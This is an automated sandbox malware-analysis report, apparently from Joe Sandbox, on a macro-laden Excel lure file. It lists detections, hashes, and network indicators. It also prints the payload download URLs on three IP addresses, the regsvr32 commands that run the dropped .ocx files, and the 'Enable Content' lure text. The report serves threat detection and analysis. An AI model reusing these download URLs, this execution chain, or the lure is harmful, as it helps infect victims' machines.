Windows Analysis Report ClaimCopy-355714047-12022021.xlsb

Overview

General Information

Sample Name: ClaimCopy-355714047-12022021.xlsb
Analysis ID: 532933
MD5: 1f51fa867f5bbce3ab1cc40bf75f7f9b
SHA1: 2c690539b53f4db35af92e2b88880c3d76fcd323
SHA256: f3dc3443c7ba185b1c8eff63807384e9bb6734fa0774d9964213dd9baf3fb3c3
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: ClaimCopy-355714047-12022021.xlsb Virustotal: Detection: 10% Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.82.126.78:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 158.69.133.78:80

Networking:

barindex
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /574766024224.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /574766024224.dat2 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.142.211.62 45.142.211.62
Source: Joe Sandbox View IP Address: 158.69.133.78 158.69.133.78
Source: Joe Sandbox View IP Address: 185.82.126.78 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: EXCEL.EXE, 00000000.00000002.1042379648.0000000007E14000.00000004.00000001.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EXCEL.EXE, 00000000.00000002.1042379648.0000000007E14000.00000004.00000001.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 19:49:37 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 19:51:44 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: EXCEL.EXE, 00000000.00000002.1040925299.0000000005297000.00000004.00000001.sdmp String found in binary or memory: http://158.69.133.78/574766024224.dat
Source: EXCEL.EXE, 00000000.00000002.1041980288.0000000005B3D000.00000004.00000001.sdmp String found in binary or memory: http://158.69.133.78/574766024224.dat2
Source: EXCEL.EXE, 00000000.00000002.1040925299.0000000005297000.00000004.00000001.sdmp String found in binary or memory: http://185.82.126.78/574766024224.dat
Source: EXCEL.EXE, 00000000.00000002.1041980288.0000000005B3D000.00000004.00000001.sdmp String found in binary or memory: http://185.82.126.78/574766024224.dat2
Source: EXCEL.EXE, 00000000.00000002.1041980288.0000000005B3D000.00000004.00000001.sdmp String found in binary or memory: http://185.82.126.78/574766024224.dat29
Source: EXCEL.EXE, 00000000.00000002.1040925299.0000000005297000.00000004.00000001.sdmp String found in binary or memory: http://45.142.211.62/574766024224.dat
Source: EXCEL.EXE, 00000000.00000002.1040925299.0000000005297000.00000004.00000001.sdmp String found in binary or memory: http://45.142.211.62/574766024224.dat#/
Source: EXCEL.EXE, 00000000.00000002.1041980288.0000000005B3D000.00000004.00000001.sdmp String found in binary or memory: http://45.142.211.62/574766024224.dat2
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.1041541153.0000000005587000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036389429.0000000004AC7000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036411560.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036402888.0000000004C57000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.1041541153.0000000005587000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036389429.0000000004AC7000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036411560.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036402888.0000000004C57000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000006.00000002.1035342275.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1035333395.0000000003A00000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000006.00000002.1034758219.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1034921258.0000000001E40000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: EXCEL.EXE, 00000000.00000002.1041541153.0000000005587000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036389429.0000000004AC7000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036411560.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036402888.0000000004C57000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.1041541153.0000000005587000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036389429.0000000004AC7000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036411560.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036402888.0000000004C57000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000006.00000002.1035342275.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1035333395.0000000003A00000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.1041541153.0000000005587000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036389429.0000000004AC7000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036411560.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036402888.0000000004C57000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD699F23.jpg Jump to behavior
Source: global traffic HTTP traffic detected: GET /574766024224.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /574766024224.dat2 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 ~EcmwARNNG Thisfileoriginate
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Screenshot number: 4 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Found Excel 4.0 Macro with suspicious formulas
Source: ClaimCopy-355714047-12022021.xlsb Initial sample: EXEC
Found protected and hidden Excel 4.0 Macro sheet
Source: ClaimCopy-355714047-12022021.xlsb Initial sample: Sheet name: Tiposa1
Found a hidden Excel 4.0 Macro sheet
Source: ClaimCopy-355714047-12022021.xlsb Macro extractor: Sheet name: Tiposa1
Source: ClaimCopy-355714047-12022021.xlsb Macro extractor: Sheet name: Tiposa
Detected potential crypto function
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02197820 0_2_02197820
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02196753 0_2_02196753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02196340 0_2_02196340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02196743 0_2_02196743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_021966F3 0_2_021966F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_021966E8 0_2_021966E8
Source: ClaimCopy-355714047-12022021.xlsb Virustotal: Detection: 10%
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx Jump to behavior
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$ClaimCopy-355714047-12022021.xlsb Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD123.tmp Jump to behavior
Source: classification engine Classification label: mal76.expl.evad.winXLSB@13/5@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ClaimCopy-355714047-12022021.xlsb Initial sample: OLE zip file path = xl/media/image1.jpg
Source: ClaimCopy-355714047-12022021.xlsb Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C8260000.0.dr Initial sample: OLE zip file path = xl/media/image1.jpg
Source: C8260000.0.dr Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\regsvr32.exe TID: 2508 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1212 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2272 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: EXCEL.EXE, 00000000.00000002.1035010452.00000000008B0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1034677381.0000000000950000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1034864920.0000000000A40000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1034863173.0000000000A20000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.1035010452.00000000008B0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1034677381.0000000000950000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1034864920.0000000000A40000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1034863173.0000000000A20000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.1035010452.00000000008B0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1034677381.0000000000950000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1034864920.0000000000A40000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1034863173.0000000000A20000.00000002.00020000.sdmp Binary or memory string: Program Manager<
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
